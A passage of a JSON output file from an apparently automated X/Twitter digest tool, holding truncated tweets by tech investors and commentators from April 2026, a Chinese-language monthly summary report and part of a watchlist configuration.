https://blog.eladgil.com/p/random-thoughts-while-gazing-at-the\n[原文链接](https://x.com/eladgil/status/2046284381439103043)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 13/12 Anti-AI regulation & violence will both increase It is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively\n[原文链接](https://x.com/eladgil/status/2046284194943500453)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months\n[原文链接](https://x.com/eladgil/status/2046284191885922498)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product This is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size…\n[原文链接](https://x.com/eladgil/status/2046284190132609299)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 10/12 Harness creating more and more stickiness to models If you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be inc…\n[原文链接](https://x.com/eladgil/status/2046284188622737554)\n\n**[2026-04-20T17:45:42+00:00]**\n> R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies. Deep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in wor…\n[原文链接](https://x.com/eladgil/status/2046284184877187540)\n\n---\n\n### ✅ @DavidSacks — David Sacks(19 条)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://x.com/DavidSacks/status/2048502978626113625)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://x.com/DavidSacks/status/2048456433981591867)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://x.com/DavidSacks/status/2048417712439689346)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://x.com/DavidSacks/status/2048111588930986354)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://x.com/DavidSacks/status/2048037985765949537)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://x.com/DavidSacks/status/2047877294476116184)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://x.com/DavidSacks/status/2047871382923469241)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://x.com/DavidSacks/status/2047867592790946189)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://x.com/DavidSacks/status/2047842000632713369)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://x.com/DavidSacks/status/2047823154655932696)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://x.com/DavidSacks/status/2047808256047821141)\n\n**[2026-04-24T16:41:47+00:00]**\n> R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.\n[原文链接](https://x.com/DavidSacks/status/2047717649849659586)\n\n**[2026-04-24T15:43:39+00:00]**\n> RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal: https://cnb.cx/4d3HAKp\n[原文链接](https://x.com/DavidSacks/status/2047703023690924289)\n\n**[2026-04-24T15:10:25+00:00]**\n> RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about…\n[原文链接](https://x.com/DavidSacks/status/2047694657107165519)\n\n**[2026-04-24T13:41:49+00:00]**\n> R to @DavidSacks: Full article: https://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share\n[原文链接](https://x.com/DavidSacks/status/2047672359377588241)\n\n**[2026-04-24T13:39:13+00:00]**\n> Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs wer…\n[原文链接](https://x.com/DavidSacks/status/2047671706660073767)\n\n**[2026-04-23T00:04:16+00:00]**\n> R to @DavidSacks: Full article: https://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices\n[原文链接](https://x.com/DavidSacks/status/2047104229773279572)\n\n**[2026-04-23T00:03:16+00:00]**\n> Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a …\n[原文链接](https://x.com/DavidSacks/status/2047103978979119580)\n\n**[2026-04-21T16:50:07+00:00]**\n> RT by @DavidSacks: This is insane… The Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\" In reality, it turns a state that Kama…\n[原文链接](https://x.com/DavidSacks/status/2046632586735243420)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(19 条)\n\n**[2026-04-27T14:02:33+00:00]**\n> R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/i…\n[原文链接](https://x.com/HarryStebbings/status/2048764743205134644)\n\n**[2026-04-27T14:02:33+00:00]**\n> Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is zero fluff, like non…\n[原文链接](https://x.com/HarryStebbings/status/2048764741435179442)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://x.com/HarryStebbings/status/2048756619622707452)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://x.com/HarryStebbings/status/2048531257399664920)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://x.com/HarryStebbings/status/2048486182904852537)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://x.com/HarryStebbings/status/2048418806867870115)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://x.com/HarryStebbings/status/2048400836024283246)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://x.com/HarryStebbings/status/2047792195868967172)\n\n**[2026-04-24T15:04:00+00:00]**\n> How Claude Design Will Hurt Figma \"Claude Design will not replace Figma directly, but it will chip away at it. It removes the need to wait for designers by letting people go straight from idea to pro…\n[原文链接](https://x.com/HarryStebbings/status/2047693043080261672)\n\n**[2026-04-23T23:43:00+00:00]**\n> Why the biggest fintech players are in for a shock. \"The shift is from human UX to agent UX. In the past, you won with dashboards, design and user experience. Now, the buyer is an AI agent, and it on…\n[原文链接](https://x.com/HarryStebbings/status/2047461264998478113)\n\n**[2026-04-23T21:23:00+00:00]**\n> I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important. \"I used to think MAUs and WAUs did not matter, now I think they are critical. In the AI era, usage is the l…\n[原文链接](https://x.com/HarryStebbings/status/2047426032840634830)\n\n**[2026-04-23T20:32:21+00:00]**\n> Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. There were next to no signs 20VC was or would be a success. He has been a dear friend ever since!\n[原文链接](https://x.com/HarryStebbings/status/2047413285675290984)\n\n**[2026-04-23T17:48:00+00:00]**\n> Does the $60BN Cursor Deal Make Sense: \"It actually makes sense when you look at what each side lacks. One has explosive revenue but weak margins due to compute and model costs. The other has massive…\n[原文链接](https://x.com/HarryStebbings/status/2047371926335857036)\n\n**[2026-04-23T16:53:42+00:00]**\n> It is a very expensive desire to be a value investor today. It is much easier to be a momentum investor, that is for sure.\n[原文链接](https://x.com/HarryStebbings/status/2047358263868436791)\n\n**[2026-04-23T14:06:50+00:00]**\n> R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF Youtube 👉 https://youtu.be/s61XVZAt5ns Apple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acqui…\n[原文链接](https://x.com/HarryStebbings/status/2047316269465006363)\n\n**[2026-04-23T14:06:50+00:00]**\n> This is the big f**king deal. Cursor acquired for $60BN by xAI I sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week: - Anthropic Hits $1TRN in S…\n[原文链接](https://x.com/HarryStebbings/status/2047316267858645088)\n\n**[2026-04-22T13:07:07+00:00]**\n> I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: 1. Nik Storonsky (Revolut) 2. @alanchanguk (Fuse Energy) 3. Adam Foroughi (AppLovin) 4. @awxjack (…\n[原文链接](https://x.com/HarryStebbings/status/2046938853445959738)\n\n**[2026-04-21T20:17:56+00:00]**\n> I have interviewed 1,000 CEOs of the largest companies over the last 10 years. Adam Foroughi is top 5 I have ever met. Easily. AppLovin Market Cap: $160BN Revenue: $5.48BN EBITDA per Head: $10M There…\n[原文链接](https://x.com/HarryStebbings/status/2046684883494600911)\n\n**[2026-04-21T15:37:00+00:00]**\n> In a world of agents, how do software providers prevent themselves from becoming valueless databases? \"The value proposition has to be: 1. How good are your APIs? 2. How well designed are they 3. Are…\n[原文链接](https://x.com/HarryStebbings/status/2046614183513604299)\n\n---\n\n### ✅ @jason — Jason Calacanis(19 条)\n\n**[2026-04-27T16:13:00+00:00]**\n> Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 From hill country ranches to Austin in ten minutes?! If you could buy one for $2m, or lease for $5k a …\n[原文链接](https://x.com/jason/status/2048797572014207114)\n\n**[2026-04-27T16:10:40+00:00]**\n> 10 minutes from manhattan to jfk is a game changer… … but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! Imagine when you can take these on …\n[原文链接](https://x.com/jason/status/2048796982227972344)\n\n**[2026-04-27T15:56:20+00:00]**\n> RT by @Jason: update! the @twistartups AI sidebar is going well The goal: a live AI sidebar with 4 personas watching the pod in real time Progress update: ✅ Side bar (Chrome extension works with any …\n[原文链接](https://x.com/jason/status/2048793378511536538)\n\n**[2026-04-27T15:03:32+00:00]**\n> Best accounts for following Austin air quality? @grok\n[原文链接](https://x.com/jason/status/2048780089295302690)\n\n**[2026-04-27T01:51:02+00:00]**\n> Incredible writing from @euphoriaHBO\n[原文链接](https://x.com/jason/status/2048580651985604783)\n\n**[2026-04-26T19:42:30+00:00]**\n> I’ve invested in 700 private companies Providing liquidity and loans to high performing founders is completely standard. In fact, investors encourage loans and secondary sales for founders to enable …\n[原文链接](https://x.com/jason/status/2048487905543237675)\n\n**[2026-04-26T18:14:04+00:00]**\n> Ok @Acosta, balls in your court\n[原文链接](https://x.com/jason/status/2048465651723882972)\n\n**[2026-04-26T18:05:09+00:00]**\n> The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare. Disgraziad\n[原文链接](https://x.com/jason/status/2048463405590225173)\n\n**[2026-04-26T17:13:01+00:00]**\n> Who made this?!\n[原文链接](https://x.com/jason/status/2048450286902235560)\n\n**[2026-04-26T16:21:34+00:00]**\n> I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th $100,000 cash prize Vegas 3, 3 minute rounds\n[原文链接](https://x.com/jason/status/2048437340218044499)\n\n**[2026-04-26T16:16:34+00:00]**\n> Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers\n[原文链接](https://x.com/jason/status/2048436081725464959)\n\n**[2026-04-26T13:51:54+00:00]**\n> RT by @Jason: Random pic of @Jason protecting our $TAO bags\n[原文链接](https://x.com/jason/status/2048399674269213067)\n\n**[2026-04-26T03:57:07+00:00]**\n> The left has a serious violence problem, which @DavidSacks called out early and often. This generation of woke democratic socialists are morally bankrupt. They believe in looting and violence as a po…\n[原文链接](https://x.com/jason/status/2048249992163242220)\n\n**[2026-04-26T03:46:17+00:00]**\n> If you’re not condemning these lunatics, you’re advocating for the end of the American empire. I’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individu…\n[原文链接](https://x.com/jason/status/2048247267182658004)\n\n**[2026-04-26T03:40:08+00:00]**\n> Heroes 🫡\n[原文链接](https://x.com/jason/status/2048245718171648271)\n\n**[2026-04-25T21:25:29+00:00]**\n> x.com/i/spaces/1nGeLyjZrkvKX\n[原文链接](https://x.com/jason/status/2048151434928017429)\n\n**[2026-04-25T19:06:45+00:00]**\n> nightmare blunt rotation\n[原文链接](https://x.com/jason/status/2048116521436590260)\n\n**[2026-04-25T19:06:07+00:00]**\n> today #knicks @mikal_bridges to 6th man/leads the bench in scoring Knicks play @23savage____ 26 minutes, he has 5 offensive boards We're up 20+ points in the second half @ATLHawks backs broken; they …\n[原文链接](https://x.com/jason/status/2048116362766127514)\n\n**[2026-04-25T17:57:08+00:00]**\n> RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for in…\n[原文链接](https://x.com/jason/status/2048099001782985057)\n\n---\n\n### ✅ @charliebilello — Charlie Bilello(14 条)\n\n**[2026-04-27T16:21:01+00:00]**\n> Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.\n[原文链接](https://x.com/charliebilello/status/2048799590044852390)\n\n**[2026-04-27T13:50:42+00:00]**\n> 2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quick…\n[原文链接](https://x.com/charliebilello/status/2048761760971096534)\n\n**[2026-04-27T13:16:36+00:00]**\n> The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s\n[原文链接](https://x.com/charliebilello/status/2048753179471323584)\n\n**[2026-04-27T13:08:19+00:00]**\n> With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjI…\n[原文链接](https://x.com/charliebilello/status/2048751094671585397)\n\n**[2026-04-27T12:53:00+00:00]**\n> RT by @charliebilello: Wondering which month is the best time to start investing? The right answer is any month. Just start!\n[原文链接](https://x.com/charliebilello/status/2048747238986305979)\n\n**[2026-04-26T16:18:48+00:00]**\n> RT by @charliebilello: Does a government shutdown negatively impact the stock market? No. The S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown w…\n[原文链接](https://x.com/charliebilello/status/2048436641451155650)\n\n**[2026-04-26T15:10:21+00:00]**\n> RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s\n[原文链接](https://x.com/charliebilello/status/2048419415222259820)\n\n**[2026-04-26T14:19:13+00:00]**\n> RT by @charliebilello: The stock market is at an all-time high. Credit spreads are near all-time lows. And inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per …\n[原文链接](https://x.com/charliebilello/status/2048406550897729561)\n\n**[2026-04-26T14:00:02+00:00]**\n> RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average…\n[原文链接](https://x.com/charliebilello/status/2048401720540061794)\n\n**[2026-04-26T13:45:00+00:00]**\n> RT by @charliebilello: Global Inflation Rates are on the RISE... Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s\n[原文链接](https://x.com/charliebilello/status/2048397937156518387)\n\n**[2026-04-26T13:30:00+00:00]**\n> RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year... Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s\n[原文链接](https://x.com/charliebilello/status/2048394162366533935)\n\n**[2026-04-26T13:14:49+00:00]**\n> RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s\n[原文链接](https://x.com/charliebilello/status/2048390341221404827)\n\n**[2026-04-25T19:55:14+00:00]**\n> RT by @charliebilello: New video is up: 📈The Week in Charts - breaking down the most important charts and themes in markets... https://www.youtube.com/watch?v=p5e0ThPjIAg\n[原文链接](https://x.com/charliebilello/status/2048128721286992166)\n\n**[2026-04-25T13:31:00+00:00]**\n> RT by @charliebilello: \"No one has ever been a success betting against America since 1776 — and they're not going to be a success in the future doing it, either.\" – Warren Buffett\n[原文链接](https://x.com/charliebilello/status/2048032027513864212)\n\n---\n\n### ✅ @WarriorTrading — Warrior Trading(0 条)\n\n---\n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://x.com/CryptoCred/status/2047079463750377958)\n\n---\n\n### ✅ @AltcoinBuzz — AltcoinBuzz(0 条)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @svwang1 — 王川(硅谷)(6 条)\n\n**[2026-04-25T01:59:39+00:00]**\n> 自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。\n[原文链接](https://x.com/svwang1/status/2047858045057909226)\n\n**[2026-04-24T15:45:26+00:00]**\n> 投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。 投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。\n[原文链接](https://x.com/svwang1/status/2047703469063377001)\n\n**[2026-04-24T00:27:47+00:00]**\n> R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。\n[原文链接](https://x.com/svwang1/status/2047472537488302502)\n\n**[2026-04-24T00:19:18+00:00]**\n> 多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。\n[原文链接](https://x.com/svwang1/status/2047470402725921150)\n\n**[2026-04-20T21:42:30+00:00]**\n> 很多事情抽象几层之后,就发现底层逻辑是一样的, 而且非常简单。同样的底层逻辑,就可以举一反三,产生组合性和复利。从表象之下抽象出本质,有时会非常费力,因为太多信息迷雾,或者利益相关者搅浑水。所以复利只能在自己有信息优势,看得清楚的地方产生。搅浑水的人有动机用完全错误的信息诱导一批人接受他的错误的逻辑,然后你发现这些错误的逻辑在别的地方不适用,但又不理解是为什么。\n[原文链接](https://x.com/svwang1/status/2046343776378257515)\n\n**[2026-04-20T21:13:36+00:00]**\n> 很多慈善机构最后异化成圈钱的工具,用类似的话术来货币化他人的善心。甚至它所有的流程都在表面上都非常合规,但和慈善的精神和最终目的没有太大关系了。所有以 KPI 管理的机构最终都会变成这样。\n[原文链接](https://x.com/svwang1/status/2046336504407142606)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://x.com/liuliu/status/2047527371486658814)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://x.com/liuliu/status/2047374234004115719)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://x.com/liuliu/status/2046986486629986435)\n\n---\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-27T17:15:13.448908+00:00\n**分析账号**: 27个 | **活跃账号**: 21个 | **推文总量**: 259条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:170 条\n- **模型能力**:53 条\n- **交易与市场**:15 条\n- **投融资与并购**:13 条\n- **算力与芯片**:8 条\n\n## 三、活跃账号 Top10\n\n- @GaryMarcus: 20 条\n- @sama: 20 条\n- @paulg: 20 条\n- @pmarca: 20 条\n- @eladgil: 20 条\n- @elonmusk: 19 条\n- @jason: 19 条\n- @HarryStebbings: 19 条\n- @DavidSacks: 19 条\n- @ylecun: 19 条\n\n## 四、代表性推文\n\n- @elonmusk | 2026-04-27T16:54:21+00:00\n - Calling him “Scam” Altman is accurate. This is very much worth reading.\n - https://x.com/elonmusk/status/2048807976991850953\n- @elonmusk | 2026-04-27T16:39:59+00:00\n - RT by @elonmusk: Sam Altman cannot be trusted. • The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI. • A major repo…\n - https://x.com/elonmusk/status/2048804363595059425\n- @elonmusk | 2026-04-27T16:31:33+00:00\n - Exactly\n - https://x.com/elonmusk/status/2048802239272169582\n- @elonmusk | 2026-04-27T16:30:27+00:00\n - Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. Greg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the actio…\n - https://x.com/elonmusk/status/2048801964457140540\n- @elonmusk | 2026-04-27T16:21:30+00:00\n - Scam Altman\n - https://x.com/elonmusk/status/2048799712375902624\n- @charliebilello | 2026-04-27T16:21:01+00:00\n - Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.\n - https://x.com/charliebilello/status/2048799590044852390\n- @jason | 2026-04-27T16:13:00+00:00\n - Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 From hill country ranches to Austin in ten minutes?! If you could buy one for $2m,…\n - https://x.com/jason/status/2048797572014207114\n- @jason | 2026-04-27T16:10:40+00:00\n - 10 minutes from manhattan to jfk is a game changer… … but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! Imagine when yo…\n - https://x.com/jason/status/2048796982227972344\n- @AndrewYNg | 2026-04-27T15:58:13+00:00\n - AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faste…\n - https://x.com/AndrewYNg/status/2048793852702757151\n- @elonmusk | 2026-04-27T15:56:52+00:00\n - RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱\n - https://x.com/elonmusk/status/2048793511701717143\n- @jason | 2026-04-27T15:56:20+00:00\n - RT by @Jason: update! the @twistartups AI sidebar is going well The goal: a live AI sidebar with 4 personas watching the pod in real time Progress update: ✅ Side bar (Chrome exten…\n - https://x.com/jason/status/2048793378511536538\n- @GaryMarcus | 2026-04-27T15:50:31+00:00\n - If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, thos…\n - https://x.com/GaryMarcus/status/2048791912149295182\n- @GaryMarcus | 2026-04-27T15:33:34+00:00\n - R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.\n - https://x.com/GaryMarcus/status/2048787646206677207\n- @GaryMarcus | 2026-04-27T15:31:37+00:00\n - This is totally wrong. Blaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and o…\n - https://x.com/GaryMarcus/status/2048787157536653627\n- @elonmusk | 2026-04-27T15:26:33+00:00\n - RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions. \"I truly believe, like in my soul, that he is trying to help human…\n - https://x.com/elonmusk/status/2048785882950549854\n- @elonmusk | 2026-04-27T15:15:09+00:00\n - If extremely violent criminals are not imprisoned, eventually they will murder innocent people\n - https://x.com/elonmusk/status/2048783014075777369\n- @jason | 2026-04-27T15:03:32+00:00\n - Best accounts for following Austin air quality? @grok\n - https://x.com/jason/status/2048780089295302690\n- @elonmusk | 2026-04-27T14:53:45+00:00\n - Excellent point\n - https://x.com/elonmusk/status/2048777628019032335\n- @GaryMarcus | 2026-04-27T14:27:36+00:00\n - yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to…\n - https://x.com/GaryMarcus/status/2048771044987777428\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-4…\n - https://x.com/HarryStebbings/status/2048764743205134644\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260429_092031.json b/data/x_brief/history/20260429_092031.json new file mode 100644 index 0000000..92e4284 --- /dev/null +++ b/data/x_brief/history/20260429_092031.json @@ -0,0 +1,5644 @@ +{ + "generated_at": "2026-04-29T09:15:14.394459+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/简报配置.md", + "watchers": [ + { + "handle": "karpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "DarioAmodei", + "name": "Dario Amodei" + }, + { + "handle": "AravSrinivas", + "name": "Aravind Srinivas" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "cursor_ai", + "name": "Cursor" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": "Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "pmarca", + "name": "Marc Andreessen" + }, + { + "handle": "david_tiantian", + "name": "David Tian Wang" + }, + { + "handle": "morganhousel", + "name": "Morgan Housel" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + "name": "David Sacks" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "charliebilello", + "name": "Charlie Bilello" + }, + { + "handle": "WarriorTrading", + "name": "Warrior Trading" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "AltcoinBuzz" + }, + { + "handle": "svwang1", + "name": "王川(硅谷)" + }, + { + "handle": "bozhou_ai", + "name": "泊舟" + }, + { + "handle": "lxfater", + "name": "铁锤人" + }, + { + "handle": "berryxia", + "name": "Berryxia" + }, + { + "handle": "Pluvio9yte", + "name": "雪踏乌云" + }, + { + "handle": "liuliu", + "name": "刘进" + }, + { + "handle": "CuiMao", + "name": "CuiMao" + }, + { + "handle": "0xAA_Science", + "name": "0xAA" + }, + { + "handle": "dingyi", + "name": "Ding" + }, + { + "handle": "GoSailGlobal", + "name": "Jason Zhu" + }, + { + "handle": "frxiaobei", + "name": "凡人小北" + }, + { + "handle": "gkxspace", + "name": "余温" + }, + { + "handle": "Stv_Lynn", + 